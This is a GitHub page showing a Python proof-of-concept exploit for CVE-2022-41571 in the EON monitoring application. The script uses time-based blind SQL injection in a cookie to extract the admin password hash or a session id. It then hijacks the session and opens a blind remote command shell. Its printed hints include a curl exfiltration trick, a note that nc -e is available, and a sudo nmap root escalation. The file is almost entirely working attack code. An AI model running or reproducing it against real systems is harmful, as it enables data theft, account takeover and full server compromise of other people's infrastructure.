-
Notifications
You must be signed in to change notification settings - Fork 24
/
POC_CVE-2022-41571.py
113 lines (88 loc) · 3.47 KB
/
POC_CVE-2022-41571.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
import requests
import warnings
import sys
import json
import readline
from time import time
warnings.filterwarnings("ignore")
# URL = "https://192.168.56.125/logout.php"
def head():
print("#"*55)
print(f"# Exploiting CVE on EON time based SQLi")
print(f"# By @\x1b[93mjrjgjk\x1b[0m")
print("#"*55)
if(len(sys.argv) != 2):
print(f"Usage: python3 {sys.argv[0]} https://exemple.eon.com/logout.php")
exit(0)
else:
if('logout.php' in sys.argv[1]):
URL = sys.argv[1]
else:
URL = sys.argv[1] + 'logout.php' if sys.argv[1][-1] == '/' else sys.argv[1] + '/logout.php'
### Constants
END = 5
TIME_USED = 0.8 # 800 milli = long time from google
MD5_LENGTH = 32
hexchars = 'abcdef0123456789'
# Recover pass
TABLE_NAME = "users"
COL_NAME = "user_passwd"
# Recover session
TABLE_NAME = "sessions"
COL_NAME = "session_id"
SQL_INSERT_PAYLOAD = f"exploit','Recover Pass',if(((select left({COL_NAME},$off$) from {TABLE_NAME} LIMIT 1)='$cur_val$'),SLEEP({TIME_USED}),0),'127.0.0.1') -- -"
def recover_letter(s, URL, PASSWORD):
for c in hexchars:
print(f"[-] \x1b[92m{PASSWORD}\x1b[91m{c}\x1b[0m" + " "*32 + "\r", end='')
payload = SQL_INSERT_PAYLOAD.replace('$off$', str(len(PASSWORD) + 1)).replace('$cur_val$', PASSWORD + c)
header = {
'Cookie': f"user_name={payload}"
}
a = time()
s.get(URL, headers=header, verify=False)
b = time()
if(b - a > TIME_USED):
return c
return END
head()
print(f"\nRecovering First data of the Table \x1b[93m{TABLE_NAME}\x1b[0m and Columns \x1b[91m{COL_NAME}\x1b[0m\n")
### Start attack
PASSWORD = ''
s = requests.Session()
### Recover admin md5 pass
for i in range(MD5_LENGTH):
new_letter = recover_letter(s, URL, PASSWORD)
if(new_letter == END):
break
PASSWORD += new_letter
print("=" * 80 + f"\n[+] \x1b[95mValue({COL_NAME})\x1b[0m = {PASSWORD}\n" + "="*80)
if(TABLE_NAME == "sessions"):
print(f"""
================================================================
Set the cookies like this to connect with the session
Format: Cookie Editor extension
================================================================
""")
print('[' + json.dumps({"name": "session_id", "value": PASSWORD, "path" : "/", "session": "true"}, indent=4) + ',')
print(json.dumps({"name": "user_id", "value": "1", "path" : "/", "session": "true"}, indent=4) + ',')
print(json.dumps({"name": "group_id", "value": "1", "path" : "/", "session": "true"}, indent=4) + ',')
print(json.dumps({"name": "user_name", "value": "admin", "path" : "/", "session": "true"}, indent=4) + ']')
print()
print("Launching semi-interactive blind shell...")
Cookies = {
"Cookie": f"session_id={PASSWORD}; user_name=admin; user_id=1; user_limitation=0; group_id=1"
}
URL_SHELL = URL[:-11] + "/module/monitoring_ged/ged_actions.php?action=confirm&global_action=2&selected_events[]=test:exploit&array_serv_system[Ged agent][status]="
CMD_INPUT = f"\x1b[93mjrjgjk\x1b[92m@\x1b[91mEONshell\x1b[0m$ "
print(f"nc -e available on default installation..")
print("This is a pseudo blind shell so no output.")
print("You can still use this: curl {IP}/?c=$(whoami) to get the output\n")
print("For Privesc: echo 'os.execute(\"/bin/bash\")' > /tmp/pe.nse && sudo /usr/bin/nmap --script=/tmp/pe.nse")
while True:
cmd = input(CMD_INPUT)
if(cmd in ['x','q','quit','exit']):
break
requests.get(URL_SHELL + cmd, headers=Cookies, verify=False)
else:
print("\nNow that you have the password you can exploit the lfi ;)")
print("Or go here: /module/module_frame/index.php?url=/lilac/autodiscovery.php")